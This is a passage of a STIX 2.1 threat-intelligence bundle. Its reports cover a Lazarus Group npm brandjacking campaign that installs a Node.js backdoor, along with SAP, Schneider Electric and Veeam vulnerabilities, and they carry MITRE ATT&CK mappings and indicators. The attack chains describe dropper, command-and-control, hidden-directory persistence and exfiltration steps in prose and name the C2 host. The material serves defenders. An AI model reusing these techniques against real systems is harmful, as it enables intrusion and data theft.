      "id": "threat-actor--a3fb0264-076f-5ffb-8b76-3b8ba5b964c7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Lazarus Group"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e4a461b4-9961-58af-87c3-974c96698032",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--f331634c-122b-5715-b25c-f4607e011caa",
      "target_ref": "threat-actor--a3fb0264-076f-5ffb-8b76-3b8ba5b964c7"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f331634c-122b-5715-b25c-f4607e011caa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Lazarus Group's Brandjacking Campaign on npm Delivers Persistent Node.js Backdoor",
      "description": "## Overview\n\nThe Lazarus Group, a state-sponsored threat actor, has launched a sophisticated brandjacking campaign targeting the npm ecosystem, leveraging deceptive package names to abuse developer trust. Active since at least early 2026, this campaign involves dozens of malicious packages, with some seeing up to 500 weekly downloads, designed to appear legitimate or ecosystem-adjacent. These packages, exemplified by \"buffer-utilities,\" go beyond simple typosquatting by employing suffix addition, version mimicry, and embedding legitimate code to evade scrutiny. Upon installation, the packages act as droppers, fetching and executing a multi-stage Node.js backdoor from remote infrastructure like `www.jsonkeeper.com`. This backdoor enables extensive reconnaissance, C2 communication, and the deployment of persistent attacker-controlled code, posing a significant supply chain risk to organizations whose developers use npm.\n\n## Attack Chain\n\n1.  **Initial Access**: A developer installs a malicious npm package (e.g., `buffer-utilities`), mistaking it for a legitimate or related package due to brandjacking techniques like suffix addition, version mimicry, or embedding legitimate code.\n2.  **Dropper Execution**: Upon installation or execution, the malicious package's embedded JavaScript code runs, decoding Base64-encoded URLs pointing to external payload servers.\n3.  **Payload Fetching**: The malicious code initiates an outbound network connection, typically from a Node.js process, to download additional payloads from command-and-control infrastructure (e.g., `www.jsonkeeper.com`).\n4.  **Second-Stage Backdoor Deployment**: The downloaded Node.js backdoor executes, performing host reconnaissance by collecting system information such as hostname, username, operating system, home directory, and active process arguments.\n5.  **Command and Control (C2) Communication**: The Node.js backdoor establishes persistent communication with its C2 server to retrieve configuration data and report collected telemetry back to the attackers.\n6.  **Persistence \u0026 Third-Stage Payload**: Following C2 instructions, the backdoor creates a hidden `.vscode` directory in the user's home folder, downloads further files (including `f.js` and a malicious `package.json`), and executes `npm install --silent` to fetch dependencies before launching `f.js` as a detached background process.\n7.  **Ongoing Control \u0026 Updates**: The deployed payload includes an update mechanism, allowing it to periodically reconnect to the C2 server, check for newer payload versions, and replace local files, ensuring continuous attacker access and control over the infected system.\n\n## Impact\n\nThis campaign represents a critical supply chain threat, particularly for organizations relying on the npm ecosystem for software development. Successful compromise means developers' systems are backdoored, potentially leading to intellectual property theft, credential compromise, further network intrusion, and disruption of development pipelines. The Node.js backdoor functions as a persistent staging framework, allowing the Lazarus Group to deploy additional malicious code and maintain long-term control. While specific victim counts are not disclosed, the wide reach of npm and the reported download numbers (up to 500 weekly for some packages) suggest a broad potential impact across various sectors.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect Node.js Process Connecting to `www.jsonkeeper.com`\" to your SIEM to identify direct C2 communication.\n*   Implement the Sigma rule \"Detect `npm install --silent` Execution\" to flag automated and potentially malicious package installations.\n*   Block network connections to `www.jsonkeeper.com` at the perimeter firewall or DNS resolver, as listed in the IOCs section.\n*   Organizations that installed packages associated with Sonatype-2026-003558 (e.g., `buffer-utilities` version `1.0.0`) should remove them and treat affected hosts as potentially compromised.\n*   Investigate compromised systems for evidence of second-stage payload execution, hidden `.vscode` directories containing suspicious files like `f.js` or `package.json`, and any unusual process activity.\n",
      "published": "2026-06-14T09:03:40Z",
      "labels": [
        "supply-chain-attack",
        "npm",
        "brandjacking",
        "Lazarus-Group",
        "nodejs",
        "malware"
      ],
      "object_refs": [
        "indicator--60a67c76-b6ed-5e6e-9547-6333142bd2e3",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--19dfae38-8eb6-5945-a348-04b8ce043122",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
        "threat-actor--a3fb0264-076f-5ffb-8b76-3b8ba5b964c7"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.sonatype.com/blog/lazarus-groups-latest-brandjacking-campaign-on-npm"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f4f35a03-aaa4-572a-abab-71f27e172e35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--54aee3c9-449a-5bee-831b-5794c1370322",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create Account",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1136",
          "url": "https://attack.mitre.org/techniques/T1136"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d1e9362-fba2-5551-842c-b73d3717a25b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--54aee3c9-449a-5bee-831b-5794c1370322",
      "target_ref": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Server Software Component",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1505",
          "url": "https://attack.mitre.org/techniques/T1505"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--582bea3f-a86d-523d-8647-2c612fb7648b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--54aee3c9-449a-5bee-831b-5794c1370322",
      "target_ref": "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fd8e0290-f9d4-525f-aa49-3f371863722d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--54aee3c9-449a-5bee-831b-5794c1370322",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5cd3c4ec-7138-5d18-962a-04546f4d8302",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--54aee3c9-449a-5bee-831b-5794c1370322",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--54aee3c9-449a-5bee-831b-5794c1370322",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Multiple Vulnerabilities Discovered in SAP Products Including SQLi, XSS, and Policy Bypass",
      "description": "## Overview\n\nCERT-FR has issued an advisory detailing multiple high-severity vulnerabilities discovered across numerous SAP products. These vulnerabilities, disclosed in SAP's June 2026 Security Bulletin, include critical flaws such as SQL Injection (SQLi), remote indirect code injection (Cross-Site Scripting - XSS), and security policy bypasses. These issues affect core SAP components like Business Objects, Commerce Cloud, Fiori, MDG, NetWeaver, ODP Data Replication APIs, S/4HANA, and Wily Introscope Enterprise Manager. If exploited, these flaws could allow attackers to gain unauthorized access to sensitive data, bypass security controls, and potentially execute arbitrary code, leading to significant compromise of critical enterprise systems and data. Organizations utilizing these unpatched SAP products are strongly advised to apply the security updates immediately.\n\n## Attack Chain\n\n1.  **Reconnaissance**: An attacker identifies internet-facing or internal SAP applications and their versions, leveraging OSINT or network scanning to pinpoint vulnerable SAP product instances susceptible to known CVEs.\n2.  **Exploitation (SQL Injection)**: The attacker crafts and sends malicious HTTP requests containing SQL payloads targeting specific parameters or input fields in SAP web applications, exploiting SQLi vulnerabilities (e.g., CVE-2026-22732, CVE-2026-24315).\n3.  **Data Exfiltration / Database Command Execution**: Successful SQLi grants the attacker unauthorized access to query the underlying database for sensitive information (e.g., user credentials, business data) or, depending on the specific vulnerability, execute arbitrary commands on the database server.\n4.  **Exploitation (Cross-Site Scripting - XSS)**: The attacker injects malicious JavaScript into vulnerable SAP application inputs or parameters, which is then reflected or stored (e.g., CVE-2026-44743, CVE-2026-44744).\n5.  **Client-Side Compromise**: When a legitimate user accesses the vulnerable SAP page, the malicious script executes in their browser, potentially leading to session hijacking, credential theft via phishing, or redirection to attacker-controlled sites.\n6.  **Exploitation (Security Policy Bypass)**: The attacker discovers and leverages flaws in authorization or access control mechanisms (e.g., CVE-2025-68161, CVE-2026-44746) to bypass security policies or gain elevated permissions.\n7.  **Unauthorized Access to Sensitive Functions**: Successful policy bypass grants the attacker access to privileged functions or data within the SAP application that would otherwise be restricted, allowing for unauthorized actions.\n8.  **Further System Compromise / Data Manipulation**: Leveraging these vulnerabilities, the attacker can achieve unauthorized data manipulation, further privilege escalation, establish persistence, or compromise the integrity of business-critical data.\n\n## Impact\n\nSuccessful exploitation of these vulnerabilities could lead to severe consequences for affected organizations. Attackers could gain unauthorized access to sensitive business data, including customer records, financial information, and intellectual property. The compromise of critical business processes hosted on SAP systems could result in significant operational disruption. Furthermore, the ability to execute arbitrary code via SQL injection could lead to complete system compromise, allowing attackers to establish persistence or pivot to other systems. Client-side attacks resulting from XSS could lead to credential theft, session hijacking, or the delivery of malware to end-users. The cumulative impact includes potential data breaches, financial losses, severe reputational damage, and non-compliance with regulatory requirements.\n\n## Recommendation\n\n*   Immediately apply all security patches released by SAP on June 9, 2026, as detailed in the SAP Security Bulletin linked in this brief, to address CVE-2025-68161, CVE-2026-22732, and others.\n*   Enable comprehensive web server logging for all internet-facing SAP applications to monitor for suspicious HTTP request patterns that may indicate SQLi or XSS attempts.\n*   Deploy the provided Sigma rules for \"Detects CVE-2026-22732 Exploitation — Web-based SQL Injection Attempt\" and \"Detects CVE-2026-44743 Exploitation — Web-based XSS Attempt\" to your SIEM and tune them for your environment.\n*   Implement and enforce robust input validation and output encoding mechanisms across all SAP web applications to mitigate SQLi and XSS vulnerabilities.\n*   Regularly review and audit access controls and security policies within SAP environments to identify and address potential bypass vulnerabilities.\n",
      "published": "2026-06-14T09:06:46Z",
      "labels": [
        "sap",
        "vulnerability",
        "sqli",
        "xss",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874",
        "attack-pattern--bea84da1-fe85-5fa2-a60d-90c3c86b9473",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0715/"
        },
        {
          "source_name": "reference",
          "url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2026.html"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-68161"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-22732"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-24315"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27671"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29145"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40128"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44743"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44744"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44746"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44748"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44750"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44751"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44754"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44755"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44757"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f68a78c1-a7f9-579c-bf12-846ced98f5f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e79d1c05-3e55-547f-b3ac-ba8dc8664e18",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ae64a63f-3107-5b7b-9e99-92a00c8a2569",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e79d1c05-3e55-547f-b3ac-ba8dc8664e18",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9664a115-089d-59f8-96d2-fa4eb5ceaaa8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--e79d1c05-3e55-547f-b3ac-ba8dc8664e18",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--e79d1c05-3e55-547f-b3ac-ba8dc8664e18",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Vulnerability in Schneider Electric EcoStruxure IT Data Center Expert Leads to Data Confidentiality Compromise (CVE-2026-8045)",
      "description": "## Overview\n\nCERT-FR has issued an advisory regarding a significant vulnerability, CVE-2026-8045, discovered in Schneider Electric EcoStruxure IT Data Center Expert products. This flaw affects all versions prior to 9.1.2 and enables an attacker to compromise the confidentiality of data stored or processed by the system. EcoStruxure IT Data Center Expert is a critical management software for data center infrastructure, meaning a breach could expose sensitive operational data, configurations, or even credentials. The vulnerability's exact technical details are not publicly disclosed, but its impact on data confidentiality necessitates immediate patching to mitigate the risk of unauthorized information access and potential exfiltration by malicious actors.\n\n## Attack Chain\n\n1.  An attacker identifies a Schneider Electric EcoStruxure IT Data Center Expert instance accessible via the network, potentially through passive reconnaissance.\n2.  The attacker determines the target system is running a vulnerable version prior to 9.1.2.\n3.  The attacker leverages CVE-2026-8045 by sending specially crafted network requests or inputs to the EcoStruxure IT DCE service.\n4.  Successful exploitation of the vulnerability bypasses existing access controls or triggers an information disclosure flaw.\n5.  The attacker gains unauthorized access to internal files, databases, or configuration parameters containing sensitive information on the EcoStruxure IT DCE server.\n6.  The attacker enumerates and discovers confidential data, which may include operational settings, device credentials, or network topology information.\n7.  The attacker extracts or views the identified sensitive data, leading to a breach of data confidentiality.\n\n## Impact\n\nThe successful exploitation of CVE-2026-8045 directly results in a data confidentiality breach. For organizations utilizing EcoStruxure IT Data Center Expert, this means an attacker could gain unauthorized access to critical data center information, such as device configurations, passwords, operational metrics, and potentially sensitive customer data. Such exposure could lead to further network compromise, intellectual property theft, regulatory fines, reputational damage, and operational disruption. The advisory does not specify observed victim numbers or targeted sectors, but any organization using affected versions is at risk.\n\n## Recommendation\n\n*   Immediately update Schneider Electric EcoStruxure IT Data Center Expert installations to version 9.1.2 or higher as recommended in the Schneider Electric bulletin (SEVD-2026-160-01).\n*   Monitor network connections originating from EcoStruxure IT Data Center Expert systems for unusual outbound traffic patterns, especially large data transfers, using rules like \"Detect Large Outbound Network Connections from EcoStruxure IT DCE\".\n*   Implement robust network segmentation to restrict direct exposure of EcoStruxure IT Data Center Expert instances, reducing the attack surface for CVE-2026-8045.\n",
      "published": "2026-06-14T09:08:06Z",
      "labels": [
        "vulnerability",
        "scada",
        "ics",
        "data-confidentiality",
        "information-disclosure"
      ],
      "object_refs": [
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0713/"
        },
        {
          "source_name": "reference",
          "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-160-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2026-160-01.pdf"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8045"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1e8970f6-a415-5517-8f77-1f153a6c5315",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.veeam.com/kb4869",
      "pattern": "[url:value = 'https://www.veeam.com/kb4869']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:09:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a13d8303-8313-521b-87b9-5aa6c9c80fbd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85429e48-2a43-58f5-8f35-31dcb7b82cf9",
      "target_ref": "indicator--1e8970f6-a415-5517-8f77-1f153a6c5315"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9fe8c4f5-c373-502e-9033-507d239e10f5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.cve.org/CVERecord?id=CVE-2026-44963",
      "pattern": "[url:value = 'https://www.cve.org/CVERecord?id=CVE-2026-44963']",
      "pattern_type": "stix",
      "valid_from": "2026-06-14T09:09:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d75732de-f386-5990-b682-01df8cbc3d91",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85429e48-2a43-58f5-8f35-31dcb7b82cf9",
      "target_ref": "indicator--9fe8c4f5-c373-502e-9033-507d239e10f5"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--86ffc01a-ba1f-52f8-8add-0e0c0773f833",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85429e48-2a43-58f5-8f35-31dcb7b82cf9",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0c1de150-aa2a-59f6-bdcf-32befe3d50de",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--85429e48-2a43-58f5-8f35-31dcb7b82cf9",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--85429e48-2a43-58f5-8f35-31dcb7b82cf9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Vulnerability in Veeam Backup \u0026 Replication Allowing Remote Code Execution (CVE-2026-44963)",
      "description": "## Overview\n\nCERT-FR has published an advisory regarding a critical remote code execution (RCE) vulnerability, CVE-2026-44963, affecting Veeam Backup \u0026 Replication software. This flaw impacts all versions prior to 12.3.2.4854. An unauthenticated attacker can exploit this vulnerability to execute arbitrary code on the underlying operating system where Veeam Backup \u0026 Replication is installed. The exploitation of such a vulnerability on a backup server is particularly severe, as these systems often have extensive network access and contain highly sensitive data, including backups of critical organizational assets. Organizations using vulnerable versions are strongly advised to apply the security patch referenced in Veeam's security bulletin kb4869 without delay to prevent potential compromise.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a public-facing or internally accessible Veeam Backup \u0026 Replication server running a vulnerable version (prior to 12.3.2.4854).\n2.  The attacker crafts a specialized malicious request designed to exploit the specific vulnerability (CVE-2026-44963) within the Veeam Backup \u0026 Replication service.\n3.  The crafted request is sent to the vulnerable Veeam Backup \u0026 Replication service, often targeting a specific network endpoint or component.\n4.  The vulnerable Veeam service processes the malicious input, leading to a bypass of security controls and successful injection of attacker-controlled code.\n5.  Arbitrary code, specified by the attacker, is executed on the server running Veeam Backup \u0026 Replication, typically under the context of the compromised Veeam service.\n6.  The attacker gains control over the compromised server, potentially with elevated privileges, enabling them to navigate the internal network.\n7.  The attacker leverages access to perform actions such as exfiltrating sensitive backup data, encrypting backups for ransomware deployment, or establishing persistent access within the environment.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-44963 leads to full remote code execution on the server hosting Veeam Backup \u0026 Replication. This results in the complete compromise of the backup infrastructure, enabling attackers to gain unauthorized access to all backed-up data, potentially delete or encrypt it, and establish a foothold for further lateral movement within the network. The highly sensitive nature of backup environments means an attack could lead to severe data loss, exfiltration of critical business information, significant operational disruption, and regulatory non-compliance. While specific victim counts are not available, the widespread use of Veeam Backup \u0026 Replication suggests a broad potential impact across various sectors.\n\n## Recommendation\n\n*   Apply the security update provided by Veeam (kb4869) immediately to patch CVE-2026-44963 on all affected Veeam Backup \u0026 Replication servers.\n*   Deploy the provided Sigma rules to your SIEM solution to detect potential exploitation attempts and post-exploitation activities.\n*   Ensure Sysmon process creation logging is enabled on all servers running Veeam Backup \u0026 Replication to capture data for the provided Sigma rules.\n*   Monitor network connections originating from Veeam Backup \u0026 Replication services for suspicious outbound traffic not aligned with normal backup operations, as highlighted by the network connection rule.\n",
      "published": "2026-06-14T09:09:13Z",
      "labels": [
        "remote-code-execution",
        "vulnerability",
        "veeam",
        "backup-replication",
        "data-exfiltration",
        "data-destruction",
        "windows"
      ],
      "object_refs": [
        "indicator--1e8970f6-a415-5517-8f77-1f153a6c5315",
        "indicator--9fe8c4f5-c373-502e-9033-507d239e10f5",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0712/"
        },
        {
          "source_name": "reference",
          "url": "https://www.veeam.com/kb4869"
        },
        {
          "source_name": "reference",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44963"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--46b58c55-96d2-543e-8561-f907a43137fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--121f059d-af64-5f1b-b10e-0a6ffc919506",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--26cd9253-27bb-5836-801b-bfcf5299be2a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--121f059d-af64-5f1b-b10e-0a6ffc919506",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8d7b3380-b0a3-5087-8313-2f4d3877e8ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--121f059d-af64-5f1b-b10e-0a6ffc919506",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
